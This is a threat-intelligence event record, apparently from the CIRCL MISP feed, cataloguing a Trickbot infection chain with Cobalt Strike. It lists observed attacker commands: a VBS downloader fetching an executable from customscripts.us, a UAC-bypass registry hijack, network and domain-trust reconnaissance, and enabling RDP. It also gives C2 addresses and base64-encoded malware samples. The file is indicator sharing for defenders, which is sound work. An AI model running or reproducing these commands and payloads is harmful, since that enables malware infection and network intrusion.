misp-circl-feed/feeds/circl/misp/5e6793ed-2868-4474-a485-42210a0a020f.json

699 lines
960 KiB
JSON
Raw Permalink Normal View History

2023-04-21 13:25:09 +00:00
{
2023-12-14 14:30:15 +00:00
"Event": {
"analysis": "0",
"date": "2020-03-10",
"extends_uuid": "",
"info": "Trickbot Gtag QW1",
"publish_timestamp": "1593748744",
"published": true,
"threat_level_id": "3",
"timestamp": "1621850731",
"uuid": "5e6793ed-2868-4474-a485-42210a0a020f",
"Orgc": {
"name": "laskowski-tech.com",
"uuid": "5e157d76-c92c-4acd-a54e-4a01950d210f"
},
"Tag": [
{
"colour": "#3b9989",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": " Cobalt Strike Beacon",
"relationship_type": ""
},
{
"colour": "#991515",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "trickbot",
"relationship_type": ""
},
{
"colour": "#0ab4a7",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "Cobalt Strike",
"relationship_type": ""
},
{
"colour": "#0088cc",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "misp-galaxy:malpedia=\"TrickBot\"",
"relationship_type": ""
},
{
"colour": "#ffffff",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "tlp:white",
"relationship_type": ""
}
],
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-66ec-41ba-8e88-41160a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /c C:\\DiskDrive\\1\\Volume\\errorfix.bat"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-5304-4794-a7f1-40e60a0a020f",
"value": "cscript //nologo C:\\DiskDrive\\1\\Volume\\BackFiles\\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-0d04-4a3b-b127-4f900a0a020f",
"value": "powershell -C Sleep -s 4;Saps 'C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe'"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-0890-41b4-8ad5-44c40a0a020f",
"value": "%WINDIR%\\system32\\cmd[.]exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846956",
"to_ids": true,
"type": "text",
"uuid": "5e67962c-11bc-4765-8d63-426c0a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-056c-4010-89f9-44730a0a020f",
"value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-6efc-4391-a42e-43560a0a020f",
"value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-b170-4f39-b589-404f0a0a020f",
"value": "\"%WINDIR%\\system32\\cmd[.]exe\" /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-4778-40ea-bbb0-4d550a0a020f",
"value": "cmd.exe \t/c net config workstation"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-8e84-4b7c-82a2-48340a0a020f",
"value": "cmd.exe /c ipconfig /all"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-1a8c-4983-9d89-40c30a0a020f",
"value": "cmd.exe \t/c net view /all"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-1a00-4fe1-b68c-4d190a0a020f",
"value": "cmd.exe \t/c net view /all /domain"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-d638-4805-b97a-46810a0a020f",
"value": "cmd.exe /c nltest /domain_trusts /all_trusts"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-50d0-4ff7-8730-45a10a0a020f",
"value": "\"%WINDIR%\\system32\\reg.exe\" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-be20-40c3-a0fc-4c250a0a020f",
"value": "%WINDIR%\\system32\\cmd[.]exe /C reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-9430-4d3c-9e36-4f300a0a020f",
"value": "reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-5e14-472f-a5ae-4c580a0a020f",
"value": "%WINDIR%\\system32\\cmd.exe /C WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583846957",
"to_ids": true,
"type": "text",
"uuid": "5e67962d-e270-4656-ad55-4dc10a0a020f",
"value": "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1583849050",
"to_ids": true,
"type": "ip-dst",
"uuid": "5e679919-46a8-43dd-b8a5-4ec174656a8a",
"value": "95.179.210.8",
"Tag": [
{
"colour": "#0ab4a7",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "Cobalt Strike",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1583849065",
"to_ids": true,
"type": "ip-dst",
"uuid": "5e679919-10c8-46d0-b1bb-4d4d74656a8a",
"value": "50.87.170.67",
"Tag": [
{
"colour": "#991515",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849050",
"to_ids": true,
"type": "url",
"uuid": "5e6799c2-a134-491d-9d9e-4d4b0a0a020f",
"value": "https://serviceuphelper.com:80/avxbDFb",
"Tag": [
{
"colour": "#0ab4a7",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "Cobalt Strike",
"relationship_type": ""
}
]
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849033",
"to_ids": true,
"type": "url",
"uuid": "5e679a4c-e90c-4176-ac29-44f30a0a020f",
"value": "http://customscripts.us/QW1.exe",
"Tag": [
{
"colour": "#991515",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849033",
"to_ids": true,
"type": "domain",
"uuid": "5e679e17-e970-4164-bfb5-48b00a0a020f",
"value": "customscripts.us",
"Tag": [
{
"colour": "#991515",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583849049",
"to_ids": true,
"type": "domain",
"uuid": "5e679e17-4efc-46ea-9030-4d270a0a020f",
"value": "serviceuphelper.com",
"Tag": [
{
"colour": "#0ab4a7",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "Cobalt Strike",
"relationship_type": ""
}
]
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"first_seen": "2020-03-09T00:00:00+00:00",
"last_seen": "2020-03-09T00:00:00+00:00",
"timestamp": "1583851022",
"to_ids": true,
"type": "url",
"uuid": "5e67a5f9-ec68-41ea-adeb-40950a0a020f",
"value": "http://64.44.133.131/images/cursor.png",
"Tag": [
{
"colour": "#991515",
2024-04-05 12:15:17 +00:00
"local": false,
2023-12-14 14:30:15 +00:00
"name": "trickbot",
"relationship_type": ""
}
]
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1584443474",
"to_ids": false,
"type": "link",
"uuid": "5e70b052-319c-47bf-a3a8-461c0a0a020f",
"value": "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1583850320",
"uuid": "5e67a350-52bc-4280-95d9-4c180a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1583850320",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e67a350-561c-4073-b344-4eb00a0a020f",
"value": "Jofert.exe|b17e4833c580bbd343a1834be0e2a65f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1583850320",
"to_ids": false,
"type": "filename",
"uuid": "5e67a350-de10-42d9-bd65-4b140a0a020f",
"value": "Jofert.exe"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1583850320",
"to_ids": true,
"type": "md5",
"uuid": "5e67a350-db84-4f0b-b908-40400a0a020f",
"value": "b17e4833c580bbd343a1834be0e2a65f"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1583850320",
"to_ids": true,
"type": "sha1",
"uuid": "5e67a350-7304-48d4-95c8-4ea30a0a020f",
"value": "7ad2d4c4fe0efd021992391fcdb7e630a19f23f6"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1583850320",
"to_ids": true,
"type": "sha256",
"uuid": "5e67a350-01ec-4b93-a1ad-49800a0a020f",
"value": "5770d351522695562143fbf5d6381cb7c13151e3d3e1cdc923759bc60e025bbe"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1583850320",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e67a350-eb98-4bcb-81fa-496c0a0a020f",
"value": "385024"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1583850335",
"uuid": "5e67a35f-bc6c-4a73-901f-4d400a0a020f",
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"data": "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",
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1583850335",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e67a35f-84b8-4b2f-bf9f-45ac0a0a020f",
"value": "errorfix.bat|4368db27ef2f07171c2c13d2e537d459"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1583850335",
"to_ids": false,
"type": "filename",
"uuid": "5e67a35f-1804-45fb-955e-430d0a0a020f",
"value": "errorfix.bat"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1583850335",
"to_ids": true,
"type": "md5",
"uuid": "5e67a35f-9a08-4661-9188-48ce0a0a020f",
"value": "4368db27ef2f07171c2c13d2e537d459"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1583850335",
"to_ids": true,
"type": "sha1",
"uuid": "5e67a35f-7b5c-478c-bac1-4ed50a0a020f",
